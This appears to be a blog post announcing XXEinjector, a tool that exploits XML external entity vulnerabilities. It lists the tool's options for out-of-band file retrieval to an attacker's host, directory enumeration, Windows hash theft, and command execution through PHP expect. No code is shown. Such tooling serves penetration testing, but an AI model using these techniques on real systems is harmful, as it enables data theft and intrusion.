XXEinjector v-21/08/2015 - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods.

XXEinjector v-21/08/2015 – Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods.

XXEinjector is a automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.
Latest Change 08/21/2015:
+ Update :XXEInjector.rb

Example Output XXEInjector

Example Output XXEInjector

Options Usage:
–host Mandatory – our IP address for reverse connections. (–host=192.168.0.2)
–file Mandatory – File containing valid HTTP request with xml. You can also mark with “XXEINJECT” a point where DTD should be injected. (–file=/tmp/req.txt)
–path Mandatory if enumerating directories – Path to enumerate. (–path=/etc)
–brute Mandatory if bruteforcing files – File with paths to bruteforce. (–brute=/tmp/brute.txt)

–oob Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (–oob=http/ftp/gopher)
–direct Use direct exploitation instead of out of band. Unique mark should be specified as a value for this argument. This mark specifies where results of XXE start and end. Specify –xml to see how XML in request file should look like. (–direct=UNIQUEMARK)
–phpfilter Use PHP filter to base64 encode target file before sending.
–enumports Enumerating unfiltered ports for reverse connection. Specify value “all” to enumerate all TCP ports. (–enumports=21,22,80,443,445)

–hashes Steals Windows hash of the user that runs an application.
–expect Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (–expect=ls)
–upload Uploads specified file using Java jar schema into temp file. (–upload=/tmp/upload.txt)
–xslt Tests for XSLT injection.

–ssl Use SSL.
–proxy Proxy to use. (–proxy=127.0.0.1:8080)
–httpport Set custom HTTP port. (–httpport=80)
–ftpport Set custom FTP port. (–ftpport=21)
–gopherport Set custom gopher port. (–gopherport=70)
–jarport Set custom port for uploading files using jar. (–jarport=1337)
–xsltport Set custom port for XSLT injection test. (–xsltport=1337)

–urlencode URL encode injected DTD. This is default for URI.
–nodtd If you want to put DTD in request by yourself. Specify “–dtd” to show how DTD should look like.
–timeout Timeout for receiving file/directory content. (–timeout=20)
–fast Skip asking what to enumerate. Prone to false-positives.
–verbose Show verbose messages.

Example :

XXInjector Script.rb:

Source : https://github.com/enjoiz |Our Post Before